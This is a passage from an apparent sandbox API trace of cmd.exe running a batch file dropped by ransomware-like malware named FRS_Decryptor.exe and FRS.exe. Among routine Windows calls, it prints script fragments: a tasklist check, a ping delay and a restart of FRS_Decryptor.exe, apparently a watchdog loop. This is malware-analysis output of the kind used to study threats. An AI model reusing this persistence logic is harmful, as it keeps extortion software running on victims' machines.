127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0107.153] GetFileType (hFile=0x24c) returned 0x1 [0107.153] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.153] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0107.153] _tell (_FileHandle=3) returned 2512 [0107.153] _close (_FileHandle=3) returned 0 [0107.153] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0107.153] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0107.153] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0107.153] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0107.153] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0107.153] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0107.153] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0107.153] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0107.153] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0107.153] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0107.153] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0107.153] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0107.153] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0107.153] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0107.153] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0107.153] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0107.153] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0107.153] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0107.153] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0107.153] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0107.153] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0107.153] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0107.153] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0107.153] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0107.153] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0107.153] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0107.153] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0107.153] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0107.153] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0107.153] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0107.153] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0107.153] _wcsicmp (_String1="ping", _String2="START") returned -3 [0107.153] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0107.153] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0107.153] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0107.153] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0107.153] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0107.153] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0107.154] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0107.154] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0107.154] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0107.154] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0107.154] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0107.154] SetErrorMode (uMode=0x0) returned 0x0 [0107.154] SetErrorMode (uMode=0x1) returned 0x0 [0107.154] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0107.154] SetErrorMode (uMode=0x0) returned 0x1 [0107.154] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.154] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0107.154] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.154] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.154] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0107.154] GetLastError () returned 0x2 [0107.154] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.154] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0107.154] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0107.154] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0107.154] GetLastError () returned 0x2 [0107.154] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59bb0 [0107.154] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0107.155] GetFileType (hFile=0x28) returned 0x2 [0107.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0107.155] _dup (_FileHandle=1) returned 3 [0107.155] _close (_FileHandle=1) returned 0 [0107.155] _wcsicmp (_String1="nul", _String2="con") returned 11 [0107.155] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0107.155] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0107.155] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0107.155] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0107.155] SetErrorMode (uMode=0x0) returned 0x0 [0107.155] SetErrorMode (uMode=0x1) returned 0x0 [0107.155] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0107.155] SetErrorMode (uMode=0x0) returned 0x1 [0107.155] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.155] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0107.155] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.155] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.155] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0107.156] GetLastError () returned 0x2 [0107.156] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.156] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a130 [0107.156] FindClose (in: hFindFile=0xd5a130 | out: hFindFile=0xd5a130) returned 1 [0107.156] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0107.156] GetLastError () returned 0x2 [0107.156] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59af0 [0107.156] FindClose (in: hFindFile=0xd59af0 | out: hFindFile=0xd59af0) returned 1 [0107.156] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0107.156] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0107.156] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0107.156] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.156] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.157] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.157] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0107.157] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x318, dwProcessId=0x12c, dwThreadId=0x168)) returned 1 [0107.160] CloseHandle (hObject=0x318) returned 1 [0107.160] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.160] GetEnvironmentStringsW () returned 0xd7e510* [0107.160] FreeEnvironmentStringsA (penv="=") returned 1 [0107.160] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0109.231] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0109.231] CloseHandle (hObject=0x36c) returned 1 [0109.231] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0109.231] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0109.231] GetEnvironmentStringsW () returned 0xd30508* [0109.231] FreeEnvironmentStringsA (penv="=") returned 1 [0109.231] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0109.231] GetEnvironmentStringsW () returned 0xd7e510* [0109.231] FreeEnvironmentStringsA (penv="=") returned 1 [0109.231] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0109.231] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0109.231] _close (_FileHandle=3) returned 0 [0109.231] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.231] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0109.232] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.232] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0109.232] _get_osfhandle (_FileHandle=0) returned 0x24 [0109.232] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0109.232] SetConsoleInputExeNameW () returned 0x1 [0109.232] GetConsoleOutputCP () returned 0x1b5 [0109.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0109.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.233] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0109.233] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0109.233] _get_osfhandle (_FileHandle=3) returned 0x24c [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0109.233] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0109.233] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0109.233] GetFileType (hFile=0x24c) returned 0x1 [0109.233] _get_osfhandle (_FileHandle=3) returned 0x24c [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0109.233] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0109.233] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0109.233] GetFileType (hFile=0x24c) returned 0x1 [0109.233] _get_osfhandle (_FileHandle=3) returned 0x24c [0109.233] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0109.233] _tell (_FileHandle=3) returned 2627 [0109.233] _close (_FileHandle=3) returned 0 [0109.233] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0109.233] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0109.233] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0109.234] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0109.234] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0109.238] feof (_File=0x76ea4c68) returned 0 [0109.238] ferror (_File=0x76ea4c68) returned 0 [0109.238] fgets (in: _Buf=0xd82da8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0109.705] feof (_File=0x76ea4c68) returned 0 [0109.705] ferror (_File=0x76ea4c68) returned 0 [0109.705] fgets (in: _Buf=0xd85afe, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0109.740] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0109.740] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43466, cbMultiByte=78, lpWideCharStr=0xd43418, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0109.740] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0109.740] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.741] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0109.741] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0109.741] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.741] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0109.741] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.741] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0109.741] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0109.741] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.741] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0109.741] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.741] GetFileType (hFile=0x260) returned 0x1 [0109.741] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0109.741] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0109.741] SetFilePointer (in: hFile=0x260, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0109.742] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] GetFileType (hFile=0x260) returned 0x1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0109.742] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0109.742] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] GetFileType (hFile=0x260) returned 0x1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0109.742] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] GetFileType (hFile=0x260) returned 0x1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.742] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0109.742] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] GetFileType (hFile=0x260) returned 0x1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0109.742] ReadFile (in: 